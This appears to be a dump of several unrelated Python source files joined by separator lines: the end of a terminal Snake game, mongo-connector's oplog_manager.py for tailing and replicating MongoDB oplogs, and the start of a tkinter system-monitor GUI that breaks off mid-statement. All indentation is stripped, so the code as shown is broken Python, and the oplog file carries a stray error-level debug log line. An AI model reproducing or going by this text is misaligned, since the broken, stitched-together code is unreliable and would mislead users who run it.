# Kills the snake if it hits something other than food
def move_towards(self, point):
newHead = point
# Kill the snake if it hits something other than food
self.check_survival(newHead)
if(not self.__dead):
self.__snake_array.append(newHead)
# Remove the tail point and store it in _potential_growth.
# If the snake eats on this move, attempt_to_eat re-inserts
# _potential_growth at the tail, growing the snake by one segment.
self._potential_growth = self.__snake_array.pop(0)
# Attempts to eat the food
def attempt_to_eat(self, food):
if(food.collide_with(self.get_head_pos())):
self.__snake_array.insert(0, self._potential_growth)
food.spawn_food(self.__snake_array)
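# Illustrative walk-through of the grow-on-eat mechanics (coordinates
# are made up for the example): with a body of [(1,5), (2,5), (3,5)]
# (tail first, head last), moving right appends the new head (4,5) and
# pops the tail (1,5) into _potential_growth, giving
# [(2,5), (3,5), (4,5)]. If (4,5) holds food, attempt_to_eat re-inserts
# (1,5) at index 0, so the snake grows to length 4 and the food
# respawns.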
# Checks whether the snake should stay alive.
# Sets __dead to True if not.
def check_survival(self, new_pos):
# Check if the head is outside upper and right boundaries
if(new_pos[0] < 0 or new_pos[1] < 0):
self.__dead = True
# Check if the head is outside bottom and left boundaries
if(new_pos[0] >= self.__game_width or new_pos[1] >= self.__game_height):
self.__dead = True
for i in range(1, len(self.get_snake_array()) - 1):
if(self.get_snake_array()[i] == new_pos):
self.__dead = True
# Changes the direction of the snake if the new direction is not
# incompatible with the old one. If incompatible, it does nothing.
def set_direction(self, direction):
invalid = False if len(direction) > 0 else True
invalid = invalid or self.__direction == self.DIRECTION_UP and direction == self.DIRECTION_DOWN
invalid = invalid or self.__direction == self.DIRECTION_DOWN and direction == self.DIRECTION_UP
invalid = invalid or self.__direction == self.DIRECTION_LEFT and direction == self.DIRECTION_RIGHT
invalid = invalid or self.__direction == self.DIRECTION_RIGHT and direction == self.DIRECTION_LEFT
if(not invalid):
self.__direction = direction
# Returns the size of the snake
def get_size(self):
return len(self.__snake_array)
# Returns whether the snake is dead
def is_dead(self):
return self.__dead
# Updates internal logic of the snake
def update(self, food):
if(not self.__dead):
if(self.__direction == self.DIRECTION_UP):
self.move_towards((self.get_head_pos()[0], self.get_head_pos()[1]-1))
elif(self.__direction == self.DIRECTION_DOWN):
self.move_towards((self.get_head_pos()[0], self.get_head_pos()[1]+1))
elif(self.__direction == self.DIRECTION_LEFT):
self.move_towards((self.get_head_pos()[0]-1, self.get_head_pos()[1]))
elif(self.__direction == self.DIRECTION_RIGHT):
self.move_towards((self.get_head_pos()[0]+1, self.get_head_pos()[1]))
self.attempt_to_eat(food)
# This class is used to instantiate the food the snake is after
class Food:
FOOD_CHAR = "x"
def __init__(self, game_width, game_height):
self.__game_width = game_width
self.__game_height = game_height
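# Note: __pos is only assigned in spawn_food, so spawn_food must be
# called before add_itself or collide_with (SnakeGame.start does this
# before entering its loop).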
# Spawn the food at a position that is not
# in the forbidden_points list
def spawn_food(self, forbidden_points):
x = random.randint(0, self.__game_width-1)
y = random.randint(0, self.__game_height-1)
# Make sure the food position is not at a forbidden
# position/point
while((x,y) in forbidden_points):
x = random.randint(0, self.__game_width-1)
y = random.randint(0, self.__game_height-1)
self.__pos = (x, y)
# Returns True if the point collides with the food,
# False otherwise
def collide_with(self, point):
if(point == self.__pos):
return True
else:
return False
def add_itself(self, game_array):
game_array[self.__pos[1]][self.__pos[0]] = self.FOOD_CHAR
# This class represents the actual game
class SnakeGame():
def __init__(self, width, height):
self.__maze = MazeMap(width, height)
self.__snake = Snake(width, height)
self.__food = Food(width, height)
# Starts the game
def start(self):
self.__io = IOController()
atexit.register(self.__io.close) # Calls a clean up function at exit.
self.__food.spawn_food(self.__snake.get_snake_array())
while(True):
game_array = self.__maze.generate_maze()
self.__food.add_itself(game_array)
self.__snake.add_itself(game_array)
self.__io.print(game_array, self.__snake.get_size(), self.__snake.is_dead())
key = self.__io.get_last_key()
if(self.__snake.is_dead()):
if(key == IOController.KEY_Q):
self.__io.close()
break
self.__snake.set_direction(self.__read_direction(key))
self.__update()
time.sleep(.5)
def __update(self):
self.__snake.update(self.__food)
def __read_direction(self, key):
direction = ""
if(key == IOController.KEY_UP):
direction = Snake.DIRECTION_UP
elif(key == IOController.KEY_DOWN):
direction = Snake.DIRECTION_DOWN
elif(key == IOController.KEY_LEFT):
direction = Snake.DIRECTION_LEFT
elif(key == IOController.KEY_RIGHT):
direction = Snake.DIRECTION_RIGHT
return direction
def main():
game = SnakeGame(30, 10)
game.start()
main()
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
"""Thread that periodically logs the current replication lag.
"""
def __init__(self, opman, interval):
super(ReplicationLagLogger, self).__init__()
self.opman = opman
self.interval = interval
self.daemon = True
def log_replication_lag(self):
checkpoint = self.opman.checkpoint
if checkpoint is None:
return
newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
if newest_write < checkpoint:
# OplogThread will perform a rollback, don't log anything
return
lag_secs = newest_write.time - checkpoint.time
if lag_secs > 0:
LOG.info(
"OplogThread for replica set '%s' is %s seconds behind " "the oplog.",
self.opman.replset_name,
lag_secs,
)
else:
lag_inc = newest_write.inc - checkpoint.inc
if lag_inc > 0:
LOG.info(
"OplogThread for replica set '%s' is %s entries "
"behind the oplog.",
self.opman.replset_name,
lag_inc,
)
else:
LOG.info(
"OplogThread for replica set '%s' is up to date " "with the oplog.",
self.opman.replset_name,
)
def run(self):
while self.opman.is_alive():
self.log_replication_lag()
time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(
self,
primary_client,
doc_managers,
oplog_progress_dict,
namespace_config,
mongos_client=None,
**kwargs
):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get("batch_size", DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get("collection_dump", True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The namespace configuration
self.namespace_config = namespace_config
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get("continue_on_error", False)
LOG.info("OplogThread: Initializing oplog thread")
self.oplog = self.primary_client.local.oplog.rs
self.replset_name = self.primary_client.admin.command("ismaster")["setName"]
if not self.oplog.find_one():
err_msg = "OplogThread: No oplog for thread:"
LOG.warning("%s %s" % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
"""Determine if this oplog entry should be skipped.
This has the possible side effect of modifying the entry's namespace
and filtering fields from updates and inserts.
"""
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
return True, False
# Ignore no-ops
if entry["op"] == "n":
return True, False
ns = entry["ns"]
if "." not in ns:
return True, False
coll = ns.split(".", 1)[1]
# Ignore system collections
if coll.startswith("system."):
return True, False
# Ignore GridFS chunks
if coll.endswith(".chunks"):
return True, False
is_gridfs_file = False
if coll.endswith(".files"):
ns = ns[: -len(".files")]
if self.namespace_config.gridfs_namespace(ns):
is_gridfs_file = True
else:
return True, False
# Commands should not be ignored, filtered, or renamed. Renaming is
# handled by the DocManagers via the CommandHelper class.
if coll == "$cmd":
return False, False
# Rename or filter out namespaces that are ignored keeping
# included gridfs namespaces.
namespace = self.namespace_config.lookup(ns)
if namespace is None:
LOG.debug(
"OplogThread: Skipping oplog entry: "
"'%s' is not in the namespace configuration." % (ns,)
)
return True, False
if "Groups" in coll:
LOG.error("DEBUG:: Groups op: %s, _id: %s" % (entry["op"], entry.get("o2", entry.get("o", {})).get("_id")))
# Update the namespace.
entry["ns"] = namespace.dest_name
# Take fields out of the oplog entry that shouldn't be replicated.
# This may nullify the document if there's nothing to do.
if not self.filter_oplog_entry(
entry,
include_fields=namespace.include_fields,
exclude_fields=namespace.exclude_fields,
):
return True, False
return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
ReplicationLagLogger(self, 30).start()
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_empty = retry_until_ok(self.init_cursor)
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_empty:
LOG.debug(
"OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping."
)
time.sleep(1)
continue
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog entries")
while cursor.alive and self.running:
LOG.debug(
"OplogThread: Cursor is still"
" alive and thread is still running."
)
for n, entry in enumerate(cursor):
# Break out if this thread should stop
if not self.running:
break
LOG.debug(
"OplogThread: Iterating through cursor,"
" document number in this cursor is %d" % n
)
skip, is_gridfs_file = self._should_skip_entry(entry)
if skip:
# update the last_ts on skipped entries to ensure
# our checkpoint does not fall off the oplog. This
# also prevents reprocessing skipped entries.
last_ts = entry["ts"]
continue
# Sync the current oplog operation
operation = entry["op"]
ns = entry["ns"]
timestamp = util.bson_ts_to_long(entry["ts"])
for docman in self.doc_managers:
try:
LOG.debug(
"OplogThread: Operation for this "
"entry is %s" % str(operation)
)
# Remove
if operation == "d":
docman.remove(entry["o"]["_id"], ns, timestamp)
remove_inc += 1
# Insert
elif operation == "i": # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get("o")
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split(".", 1)
gridfile = GridFSFile(
self.primary_client[db][coll], doc
)
docman.insert_file(gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == "u":
docman.update(
entry["o2"]["_id"], entry["o"], ns, timestamp
)
update_inc += 1
# Command
elif operation == "c":
# use unmapped namespace
doc = entry.get("o")
docman.handle_command(doc, entry["ns"], timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r" % entry
)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry
)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far"
% (remove_inc, upsert_inc, update_inc)
)
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry["ts"]
# Update the checkpoint once per batch. With the default
# batch_size of -1, n % -1 == 0 for every n, so this branch
# never fires and the checkpoint is only written after the
# cursor has been drained (below).
if n % self.batch_size == 1:
self.update_checkpoint(last_ts)
last_ts = None
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after "
"processing new oplog entries"
)
self.update_checkpoint(last_ts)
except (
pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError,
):
LOG.exception(
"Cursor closed due to an exception. " "Will attempt to reconnect."
)
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread."
)
self.update_checkpoint(last_ts)
LOG.debug(
"OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d" % (remove_inc, upsert_inc, update_inc)
)
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split(".")
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
"""Find the fields in the update document which match the given field.
Both the field and the top level keys in the doc may be in dot
notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
the empty list if the field is not present.
"""
def find_partial_matches():
for key in doc:
if len(key) > len(field):
# Handle case where field is a prefix of key, eg field is
# 'a' and key is 'a.b'.
if key.startswith(field) and key[len(field)] == ".":
yield [key], doc[key]
# Continue searching, there may be multiple matches.
# For example, field 'a' should match 'a.b' and 'a.c'.
elif len(key) < len(field):
# Handle case where key is a prefix of field, eg field is
# 'a.b' and key is 'a'.
if field.startswith(key) and field[len(key)] == ".":
# Search for the remaining part of the field
matched = cls._find_field(field[len(key) + 1 :], doc[key])
if matched:
# Add the top level key to the path.
match = matched[0]
match[0].insert(0, key)
yield match
# Stop searching, it's not possible for any other
# keys in the update doc to match this field.
return
try:
return [([field], doc[field])]
except KeyError:
# Field does not exactly match any key in the update doc.
return list(find_partial_matches())
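# Illustrative examples (documents are made up):
# _find_update_fields("a.b", {"a": {"b": 1, "c": 2}}) -> [(["a", "b"], 1)]
# _find_update_fields("a", {"a.b": 5}) -> [(["a.b"], 5)]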
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def filter_oplog_entry(self, entry, include_fields=None, exclude_fields=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
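# Rough examples of the filtering below (field values are made up):
# - an insert entry with o={"a": 1, "b": 2} and include_fields=["a"]
#   ends up with o={"a": 1}
# - an update entry with o={"$set": {"a": 1, "b": 2}} and
#   exclude_fields=["b"] ends up with o={"$set": {"a": 1}}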
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry["o"]
# Version 3.6 of mongodb includes a $v,
# see https://jira.mongodb.org/browse/SERVER-32240
if "$v" in entry_o:
entry_o.pop("$v")
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry["op"] == "i":
entry["o"] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry["op"] == "u" and ("$set" in entry_o or "$unset" in entry_o):
if "$set" in entry_o:
entry["o"]["$set"] = filter_fields(entry_o["$set"], fields, update=True)
if "$unset" in entry_o:
entry["o"]["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True
)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o["$set"]:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o["$unset"]:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry["op"] == "u":
entry["o"] = filter_fields(entry_o, fields)
return entry
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, excluding
no-op entries.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {"op": {"$ne": "n"}}
if timestamp is None:
cursor = self.oplog.find(query, cursor_type=CursorType.TAILABLE_AWAIT)
else:
query["ts"] = {"$gte": timestamp}
cursor = self.oplog.find(
query, cursor_type=CursorType.TAILABLE_AWAIT, oplog_replay=True
)
return cursor
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split(".", 1)
return self.primary_client[database][coll]
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
# Flag if this oplog thread was cancelled during the collection dump.
# Use a list to work around Python scoping.
dump_cancelled = [False]
def get_all_ns():
ns_set = []
gridfs_ns_set = []
db_list = self.namespace_config.get_included_databases()
if not db_list:
# Only use listDatabases when the configured databases are not
# explicit.
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names
)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs chunks collections
if coll.endswith(".chunks"):
continue
if coll.endswith(".files"):
namespace = "%s.%s" % (database, coll)
namespace = namespace[: -len(".files")]
if self.namespace_config.gridfs_namespace(namespace):
gridfs_ns_set.append(namespace)
else:
namespace = "%s.%s" % (database, coll)
if self.namespace_config.map_namespace(namespace):
ns_set.append(namespace)
return ns_set, gridfs_ns_set
dump_set, gridfs_dump_set = get_all_ns()
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
def docs_to_dump(from_coll):
last_id = None
attempts = 0
projection = self.namespace_config.projection(from_coll.full_name)
# Loop to handle possible AutoReconnect
while attempts < 60:
if last_id is None:
cursor = retry_until_ok(
from_coll.find,
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
else:
cursor = retry_until_ok(
from_coll.find,
{"_id": {"$gt": last_id}},
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
try:
for doc in cursor:
if not self.running:
# Thread was joined while performing the
# collection dump.
dump_cancelled[0] = True
raise StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect, pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_failed = 0
for namespace in dump_set:
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
for num, doc in enumerate(docs_to_dump(from_coll)):
try:
dm.upsert(doc, mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception("Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
if num % 10000 == 0:
LOG.info(
"Upserted %d out of approximately %d docs "
"from collection '%s'",
num + 1,
total_docs,
namespace,
)
if num is not None:
LOG.info(
"Upserted %d out of approximately %d docs from "
"collection '%s'",
num + 1,
total_docs,
namespace,
)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
for namespace in dump_set:
from_coll = self.get_collection(namespace)
total_docs = retry_until_ok(from_coll.count)
mapped_ns = self.namespace_config.map_namespace(namespace)
LOG.info(
"Bulk upserting approximately %d docs from " "collection '%s'",
total_docs,
namespace,
)
dm.bulk_upsert(docs_to_dump(from_coll), mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception(
"OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially"
)
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
LOG.debug(
"OplogThread: Using bulk upsert function for " "collection dump"
)
upsert_all(dm)
if gridfs_dump_set:
LOG.info(
"OplogThread: dumping GridFS collections: %s", gridfs_dump_set
)
# Dump GridFS files
for gridfs_ns in gridfs_dump_set:
mongo_coll = self.get_collection(gridfs_ns)
from_coll = self.get_collection(gridfs_ns + ".files")
dest_ns = self.namespace_config.map_namespace(gridfs_ns)
for doc in docs_to_dump(from_coll):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except Exception:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical(
"Exception during collection dump", exc_info=errors.get_nowait()
)
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
return None
if dump_cancelled[0]:
LOG.warning(
"Initial collection dump was interrupted. "
"Will re-run the collection dump on next startup."
)
return None
return timestamp
def _get_oplog_timestamp(self, newest_entry):
"""Return the timestamp of the latest or earliest entry in the oplog.
"""
sort_order = pymongo.DESCENDING if newest_entry else pymongo.ASCENDING
curr = (
self.oplog.find({"op": {"$ne": "n"}}).sort("$natural", sort_order).limit(-1)
)
try:
ts = next(curr)["ts"]
except StopIteration:
LOG.debug("OplogThread: oplog is empty.")
return None
LOG.debug(
"OplogThread: %s oplog entry has timestamp %s."
% ("Newest" if newest_entry else "Oldest", ts)
)
return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
try:
# Tailable cursors can not have singleBatch=True in MongoDB > 3.3
next(cursor.clone().remove_option(CursorType.TAILABLE_AWAIT).limit(-1))
return False
except StopIteration:
return True
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and True if the cursor is empty.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
self.update_checkpoint(timestamp)
if timestamp is None:
return None, True
else:
# Collection dump disabled:
# Return cursor to beginning of oplog but do not set the
# checkpoint. The checkpoint will be set after an operation
# has been applied.
cursor = self.get_oplog_cursor()
return cursor, self._cursor_empty(cursor)
cursor = self.get_oplog_cursor(timestamp)
cursor_empty = self._cursor_empty(cursor)
if cursor_empty:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from " "get_oplog_cursor")
self.update_checkpoint(self.rollback())
return self.init_cursor()
first_oplog_entry = next(cursor)
oldest_ts_long = util.bson_ts_to_long(self.get_oldest_oplog_timestamp())
checkpoint_ts_long = util.bson_ts_to_long(timestamp)
if checkpoint_ts_long < oldest_ts_long:
# We've fallen behind, the checkpoint has fallen off the oplog
return None, True
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
if cursor_ts_long > checkpoint_ts_long:
# The checkpoint is not present in this oplog and the oplog
# did not rollover. This means that we connected to a new
# primary which did not replicate the checkpoint and which has
# new changes in its oplog for us to process.
# rollback, update checkpoint, and retry
LOG.debug(
"OplogThread: Initiating rollback from "
"get_oplog_cursor: new oplog entries found but "
"checkpoint is not present"
)
self.update_checkpoint(self.rollback())
return self.init_cursor()
# first entry has been consumed
return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if checkpoint is not None and checkpoint != self.checkpoint:
self.checkpoint = checkpoint
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
# If we have the repr of our oplog collection
# in the dictionary, remove it and replace it
# with our replica set name.
# This allows an easy upgrade path from mongo-connector 2.3.
# For an explanation of the format change, see the comment in
# read_last_checkpoint.
oplog_dict.pop(str(self.oplog), None)
oplog_dict[self.replset_name] = checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s", checkpoint)
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
# In versions of mongo-connector 2.3 and before,
# we used the repr of the
# oplog collection as keys in the oplog_progress dictionary.
# In versions thereafter, we use the replica set name. For backwards
# compatibility, we check for both.
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
try:
# New format.
ret_val = oplog_dict[self.replset_name]
except KeyError:
try:
# Old format.
ret_val = oplog_dict[oplog_str]
except KeyError:
pass
LOG.debug("OplogThread: reading last checkpoint as %s " % str(ret_val))
self.checkpoint = ret_val
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug(
"OplogThread: Initiating rollback sequence to bring "
"system into a consistent state."
)
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(
last_docs, key=lambda x: x["_ts"] if x else float("-inf")
)
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc["_ts"])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{"ts": {"$lte": target_ts}, "op": {"$ne": "n"}},
sort=[("$natural", pymongo.DESCENDING)],
)
LOG.debug("OplogThread: last oplog entry is %s" % str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry["ts"]
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc["_ts"]
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc["ns"] in rollback_set:
rollback_set[doc["ns"]].append(doc)
else:
rollback_set[doc["ns"]] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = self.namespace_config.unmap_namespace(namespace)
if not original_namespace:
original_namespace = namespace
database, coll = original_namespace.split(".", 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc["_id"]) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{"_id": {"$in": bson_obj_id_list}},
projection=self.namespace_config.projection(original_namespace),
)
# Doc list are docs in target system, to_update are
# Docs in mongo
doc_hash = {} # Hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc["_id"])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc["_id"] in doc_hash:
del doc_hash[doc["_id"]]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
# Delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent " "docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(
document_id,
namespace,
util.bson_ts_to_long(rollback_cutoff_ts),
)
remov_inc += 1
LOG.debug("OplogThread: Rollback, removed %r " % document_id)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % document_id
)
LOG.debug("OplogThread: Rollback, removed %d docs." % remov_inc)
# Insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents " "from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(
doc, namespace, util.bson_ts_to_long(rollback_cutoff_ts)
)
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception(
"OplogThread: Rollback, Unable to " "insert %r" % doc
)
LOG.debug(
"OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts))
)
return rollback_cutoff_ts
|
main.py
|
# use tkinter to create a GUI with four tabs - current, historical, export CSV and import CSV
# import libraries
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
import csv
import matplotlib.pyplot as plt
import numpy as np
from utils import data_util, database_util, graph_util
import threading
import time
import platform
import cache
from tkcalendar import Calendar
from datetime import datetime, timedelta
from sys import platform
if platform == "win32":
import warnings
warnings.filterwarnings(
"ignore", message="tight_layout : falling back to Agg renderer")
def graph():
# generate random data
a = np.random.normal(0, 1, 100)
plt.hist(a, bins=20, color='#3B3C6E')
plt.show()
def setup_window():
# make button on tab1
# make window
if platform == "win32":
import ctypes
ctypes.windll.shcore.SetProcessDpiAwareness(1)
window = tk.Tk()
window.title("Your Computer At A Glance (YCAAG)")
if platform == "win32":
window.geometry("300x650")
else:
window.geometry("400x750")
window.resizable(0, 0)
photo = tk.PhotoImage(file="images/icon.png")
window.iconphoto(False, photo)
s = ttk.Style(window)
if platform != "win32":
s.theme_use('clam')
s.layout("Tab",
